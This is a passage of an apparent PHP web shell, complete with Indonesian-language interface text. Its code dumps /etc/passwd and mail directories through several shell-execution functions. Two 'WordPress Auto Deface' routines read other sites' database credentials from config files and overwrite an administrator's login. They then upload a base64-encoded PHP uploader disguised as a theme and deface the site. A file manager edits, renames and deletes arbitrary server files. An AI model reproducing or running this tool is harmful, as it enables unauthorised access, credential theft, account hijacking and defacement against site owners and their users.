3921.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
3922.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="mix"></form></td>
3923. </tr></table>Bypass User With : <table style="width:50%">
3924. <tr>
3925.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
3926.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
3927.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
3928.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
3929.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
3930. </tr>
3931. </table><br>';
3932.  
3933.  
3934. if ($_POST['awkuser']) {
3935. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3936. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
3937. echo "</textarea><br>";
3938. }
3939. if ($_POST['systuser']) {
3940. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3941. echo system("ls /var/mail");
3942. echo "</textarea><br>";
3943. }
3944. if ($_POST['passthuser']) {
3945. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3946. echo passthru("ls /var/mail");
3947. echo "</textarea><br>";
3948. }
3949. if ($_POST['exuser']) {
3950. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3951. echo exec("ls /var/mail");
3952. echo "</textarea><br>";
3953. }
3954. if ($_POST['shexuser']) {
3955. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3956. echo shell_exec("ls /var/mail");
3957. echo "</textarea><br>";
3958. }
3959. if($_POST['syst'])
3960. {
3961. echo"<textarea class='inputz' cols='65' rows='15'>";
3962. echo system("cat /etc/passwd");
3963. echo"</textarea><br><br><b></b><br>";
3964. }
3965. if($_POST['passth'])
3966. {
3967. echo"<textarea class='inputz' cols='65' rows='15'>";
3968. echo passthru("cat /etc/passwd");
3969. echo"</textarea><br><br><b></b><br>";
3970. }
3971. if($_POST['ex'])
3972. {
3973. echo"<textarea class='inputz' cols='65' rows='15'>";
3974. echo exec("cat /etc/passwd");
3975. echo"</textarea><br><br><b></b><br>";
3976. }
3977. if($_POST['shex'])
3978. {
3979. echo"<textarea class='inputz' cols='65' rows='15'>";
3980. echo shell_exec("cat /etc/passwd");
3981. echo"</textarea><br><br><b></b><br>";
3982. }
3983. echo '<center>';
3984. if($_POST['mix'])
3985. {
3986. echo"<textarea class='inputz' cols='65' rows='15'>";
3987. for($uid=0;$uid<60000;$uid++){
3988. $ara = posix_getpwuid($uid);
3989. if (!empty($ara)) {
3990. while (list ($key, $val) = each($ara)){
3991. print "$val:";
3992. }
3993. print "\n";
3994. }
3995. }
3996. echo"</textarea><br><br>";
3997. }
3998. //
3999.  
4000. //
4001. } elseif($_GET['do'] == 'auto_dwp') {
4002.     if($_POST['auto_deface_wp']) {
4003.         function anucurl($sites) {
4004.             $ch = curl_init($sites);
4005.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4006.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4007.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4008.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
4009.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4010.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4011.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4012.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4013.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4014.             $data = curl_exec($ch);
4015.                   curl_close($ch);
4016.             return $data;
4017.         }
4018.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
4019.             $post = array(
4020.                    "log" => "$userr",
4021.                    "pwd" => "$pass",
4022.                    "rememberme" => "forever",
4023.                    "wp-submit" => "$wp_submit",
4024.                    "redirect_to" => "$web",
4025.                    "testcookie" => "1",
4026.                    );
4027.             $ch = curl_init($cek);
4028.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4029.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4030.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4031.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4032.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4033.                   curl_setopt($ch, CURLOPT_POST, 1);
4034.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
4035.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4036.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4037.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4038.             $data = curl_exec($ch);
4039.                   curl_close($ch);
4040.             return $data;
4041.         }
4042.         $scan = $_POST['link_config'];
4043.         $link_config = scandir($scan);
4044.         $script = htmlspecialchars($_POST['script']);
4045.         $user = "42247551N5";
4046.         $pass = "42247551N5";
4047.         $passx = md5($pass);
4048.         foreach($link_config as $dir_config) {
4049.             if(!is_file("$scan/$dir_config")) continue;
4050.             $config = file_get_contents("$scan/$dir_config");
4051.             if(preg_match("/WordPress/", $config)) {
4052.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
4053.                 $dbuser = ambilkata($config,"DB_USER', '","'");
4054.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
4055.                 $dbname = ambilkata($config,"DB_NAME', '","'");
4056.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
4057.                 $prefix = $dbprefix."users";
4058.                 $option = $dbprefix."options";
4059.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
4060.                 $db = mysql_select_db($dbname);
4061.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4062.                 $result = mysql_fetch_array($q);
4063.                 $id = $result[ID];
4064.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
4065.                 $result2 = mysql_fetch_array($q2);
4066.                 $target = $result2[option_value];
4067.                 if($target == '') {                
4068.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
4069.                 } else {
4070.                     echo "[+] $target <br>";
4071.                 }
4072.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
4073.                 if(!$conn OR !$db OR !$update) {
4074.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
4075.                     mysql_close($conn);
4076.                 } else {
4077.                     $site = "$target/wp-login.php";
4078.                     $site2 = "$target/wp-admin/theme-install.php?upload";
4079.                     $b1 = anucurl($site2);
4080.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
4081.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
4082.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
4083.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
4084.                     $www = "m.php";
4085.                     $fp5 = fopen($www,"w");
4086.                     fputs($fp5,$upload3);
4087.                     $post2 = array(
4088.                             "_wpnonce" => "$anu2",
4089.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
4090.                             "themezip" => "@$www",
4091.                             "install-theme-submit" => "Install Now",
4092.                             );
4093.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
4094.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4095.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4096.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4097.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4098.                           curl_setopt($ch, CURLOPT_POST, 1);
4099.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
4100.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4101.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4102.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4103.                     $data3 = curl_exec($ch);
4104.                           curl_close($ch);
4105.                     $y = date("Y");
4106.                     $m = date("m");
4107.                     $namafile = "id.php";
4108.                     $fpi = fopen($namafile,"w");
4109.                     fputs($fpi,$script);
4110.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
4111.                            curl_setopt($ch6, CURLOPT_POST, true);
4112.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4113.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4114.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4115.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4116.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
4117.                     $postResult = curl_exec($ch6);
4118.                            curl_close($ch6);
4119.                     $as = "$target/k.php";
4120.                     $bs = anucurl($as);
4121.                     if(preg_match("#$script#is", $bs)) {
4122.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4123.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4124.                         } else {
4125.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
4126.                         echo "[!!] coba aja manual: <br>";
4127.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4128.                         echo "[+] username: <font color=lime>$user</font><br>";
4129.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
4130.                         }
4131.                     mysql_close($conn);
4132.                 }
4133.             }
4134.         }
4135.     } else {
4136.         echo "<center><h1>WordPress Auto Deface</h1>
4137.         <form method='post'>
4138.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
4139.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By AZZATSSINS' required><br>
4140.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4141.         </form>
4142.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
4143.         </center>";
4144.     }
4145. } elseif($_GET['do'] == 'auto_dwp2') {
4146.     if($_POST['auto_deface_wp']) {
4147.         function anucurl($sites) {
4148.             $ch = curl_init($sites);
4149.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4150.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4151.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4152.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
4153.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4154.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4155.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4156.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4157.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
4158.             $data = curl_exec($ch);
4159.                   curl_close($ch);
4160.             return $data;
4161.         }
4162.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
4163.             $post = array(
4164.                    "log" => "$userr",
4165.                    "pwd" => "$pass",
4166.                    "rememberme" => "forever",
4167.                    "wp-submit" => "$wp_submit",
4168.                    "redirect_to" => "$web",
4169.                    "testcookie" => "1",
4170.                    );
4171.             $ch = curl_init($cek);
4172.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4173.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4174.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4175.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4176.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4177.                   curl_setopt($ch, CURLOPT_POST, 1);
4178.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
4179.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4180.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4181.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4182.             $data = curl_exec($ch);
4183.                   curl_close($ch);
4184.             return $data;
4185.         }
4186.         $link = explode("\r\n", $_POST['link']);
4187.         $script = htmlspecialchars($_POST['script']);
4188.         $user = "indoxploit";
4189.         $pass = "indoxploit";
4190.         $passx = md5($pass);
4191.         foreach($link as $dir_config) {
4192.             $config = anucurl($dir_config);
4193.             $dbhost = ambilkata($config,"DB_HOST', '","'");
4194.             $dbuser = ambilkata($config,"DB_USER', '","'");
4195.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
4196.             $dbname = ambilkata($config,"DB_NAME', '","'");
4197.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
4198.             $prefix = $dbprefix."users";
4199.             $option = $dbprefix."options";
4200.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
4201.             $db = mysql_select_db($dbname);
4202.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4203.             $result = mysql_fetch_array($q);
4204.             $id = $result[ID];
4205.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
4206.             $result2 = mysql_fetch_array($q2);
4207.             $target = $result2[option_value];
4208.             if($target == '') {                
4209.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
4210.             } else {
4211.                 echo "[+] $target <br>";
4212.             }
4213.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
4214.             if(!$conn OR !$db OR !$update) {
4215.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
4216.                 mysql_close($conn);
4217.             } else {
4218.                 $site = "$target/wp-login.php";
4219.                 $site2 = "$target/wp-admin/theme-install.php?upload";
4220.                 $b1 = anucurl($site2);
4221.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
4222.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
4223.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
4224.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
4225.                 $www = "m.php";
4226.                 $fp5 = fopen($www,"w");
4227.                 fputs($fp5,$upload3);
4228.                 $post2 = array(
4229.                         "_wpnonce" => "$anu2",
4230.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
4231.                         "themezip" => "@$www",
4232.                         "install-theme-submit" => "Install Now",
4233.                         );
4234.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
4235.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4236.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4237.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4238.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4239.                       curl_setopt($ch, CURLOPT_POST, 1);
4240.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
4241.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4242.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4243.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4244.                 $data3 = curl_exec($ch);
4245.                       curl_close($ch);
4246.                 $y = date("Y");
4247.                 $m = date("m");
4248.                 $namafile = "id.php";
4249.                 $fpi = fopen($namafile,"w");
4250.                 fputs($fpi,$script);
4251.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
4252.                        curl_setopt($ch6, CURLOPT_POST, true);
4253.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4254.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4255.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4256.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4257.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
4258.                 $postResult = curl_exec($ch6);
4259.                        curl_close($ch6);
4260.                 $as = "$target/k.php";
4261.                 $bs = anucurl($as);
4262.                 if(preg_match("#$script#is", $bs)) {
4263.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4264.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4265.                     } else {
4266.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
4267.                     echo "[!!] coba aja manual: <br>";
4268.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4269.                     echo "[+] username: <font color=lime>$user</font><br>";
4270.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
4271.                     }
4272.                 mysql_close($conn);
4273.             }
4274.         }
4275.     } else {
4276.         echo "<center><h1>WordPress Auto Deface V.2</h1>
4277.         <form method='post'>
4278.         Link Config: <br>
4279.         <textarea name='link' placeholder='http://target.com/folder_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
4280.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By AZZATSSINS' required><br>
4281.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4282.         </form></center>";
4283.     }
4284. } elseif($_GET['act'] == 'newfile') {
4285.     if($_POST['new_save_file']) {
4286.         $newfile = htmlspecialchars($_POST['newfile']);
4287.         $fopen = fopen($newfile, "a+");
4288.         if($fopen) {
4289.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4290.         } else {
4291.             $act = "<font color=red>permission denied</font>";
4292.         }
4293.     }
4294.     echo $act;
4295.     echo "<form method='post'>
4296.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4297.     <input type='submit' name='new_save_file' value='Submit'>
4298.     </form>";
4299. } elseif($_GET['act'] == 'newfolder') {
4300.     if($_POST['new_save_folder']) {
4301.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4302.         if(!mkdir($new_folder)) {
4303.             $act = "<font color=red>permission denied</font>";
4304.         } else {
4305.             $act = "<script>window.location='?dir=".$dir."';</script>";
4306.         }
4307.     }
4308.     echo $act;
4309.     echo "<form method='post'>
4310.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4311.     <input type='submit' name='new_save_folder' value='Submit'>
4312.     </form>";
4313. } elseif($_GET['act'] == 'rename_dir') {
4314.     if($_POST['dir_rename']) {
4315.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4316.         if($dir_rename) {
4317.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4318.         } else {
4319.             $act = "<font color=red>permission denied</font>";
4320.         }
4321.     echo "".$act."<br>";
4322.     }
4323.     echo "<form method='post'>
4324.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4325.     <input type='submit' name='dir_rename' value='rename'>
4326.     </form>";
4327. } elseif($_GET['act'] == 'delete_dir') {
4328.     function Delete($path)
4329. {
4330.     if (is_dir($path) === true)
4331.     {
4332.         $files = array_diff(scandir($path), array('.', '..'));
4333.         foreach ($files as $file)
4334.         {
4335.             Delete(realpath($path) . '/' . $file);
4336.         }
4337.         return rmdir($path);
4338.     }
4339.     else if (is_file($path) === true)
4340.     {
4341.         return unlink($path);
4342.     }
4343.     return false;
4344. }
4345.     $delete_dir = Delete($dir);
4346.     if($delete_dir) {
4347.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4348.     } else {
4349.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
4350.     }
4351.     echo $act;
4352. } elseif($_GET['act'] == 'view') {
4353.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4354.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4355. } elseif($_GET['act'] == 'edit') {
4356.     if($_POST['save']) {
4357.         $save = file_put_contents($_GET['file'], $_POST['src']);
4358.         if($save) {
4359.             $act = "<font color=lime>Saved!</font>";
4360.         } else {
4361.             $act = "<font color=red>permission denied</font>";
4362.         }
4363.     echo "".$act."<br>";
4364.     }
4365.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4366.     echo "<form method='post'>
4367.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4368.     <input type='submit' value='Save' name='save' style='width: 500px;'>
4369.     </form>";
4370. } elseif($_GET['act'] == 'rename') {
4371.     if($_POST['do_rename']) {
4372.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4373.         if($rename) {
4374.             $act = "<script>window.location='?dir=".$dir."';</script>";
4375.         } else {
4376.             $act = "<font color=red>permission denied</font>";
4377.         }
4378.     echo "".$act."<br>";
4379.     }
4380.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4381.     echo "<form method='post'>
4382.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4383.     <input type='submit' name='do_rename' value='rename'>
4384.     </form>";
4385. } elseif($_GET['act'] == 'delete') {
4386.     $delete = unlink($_GET['file']);
4387.     if($delete) {
4388.         $act = "<script>window.location='?dir=".$dir."';</script>";
4389.     } else {
4390.         $act = "<font color=red>permission denied</font>";
4391.     }
4392.     echo $act;
4393. }else {
4394.     if(is_dir($dir) == true) {
4395.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4396.         <tr>
4397.         <th class="th_home"><center>ISI SEMPAK</center></th>
4398.         <th class="th_home"><center>JENIS</center></th>
4399.         <th class="th_home"><center>UKURAN BH</center></th>
4400.         <th class="th_home"><center>TERAKHIR DI MODIF</center></th>
4401.         <th class="th_home"><center>MONGGO</center></th>
4402.         <th class="th_home"><center>KATE MBOK APAKNO</center></th>
4403.         </tr>';
4404.         $scandir = scandir($dir);
4405.         foreach($scandir as $dirx) {
4406.             $dtype = filetype("$dir/$dirx");
4407.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4408.             if(!is_dir("$dir/$dirx")) continue;
4409.             if($dirx === '..') {
4410.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4411.             } elseif($dirx === '.') {
4412.                 $href = "<a href='?dir=$dir'>$dirx</a>";
4413.             } else {
4414.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4415.             }
4416.             if($dirx === '.' || $dirx === '..') {
4417.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4418.                 } else {
4419.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4420.             }
4421.             echo "<tr>";
4422.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4423.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$dtype</center></td>";
4424.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>-</center></th>";
4425.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$dtime</center></td>";
4426.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4427.             echo "<td class='td_home' style='padding-left: 15px;text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'>$act_dir</td>";
4428.         }
4429.         echo "</tr>";
4430.         foreach($scandir as $file) {
4431.             $ftype = filetype("$dir/$file");
4432.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4433.             $size = filesize("$dir/$file")/1024;
4434.             $size = round($size,3);
4435.             if($size > 1024) {
4436.                 $size = round($size/1024,2). 'MB';
4437.             } else {
4438.                 $size = $size. 'KB';
4439.             }
4440.             if(!is_file("$dir/$file")) continue;
4441.             echo "<tr>";
4442.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4443.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$ftype</center></td>";
4444.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$size</center></td>";
4445.             echo "<td class='td_home' style='text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><center>$ftime</center></td>";
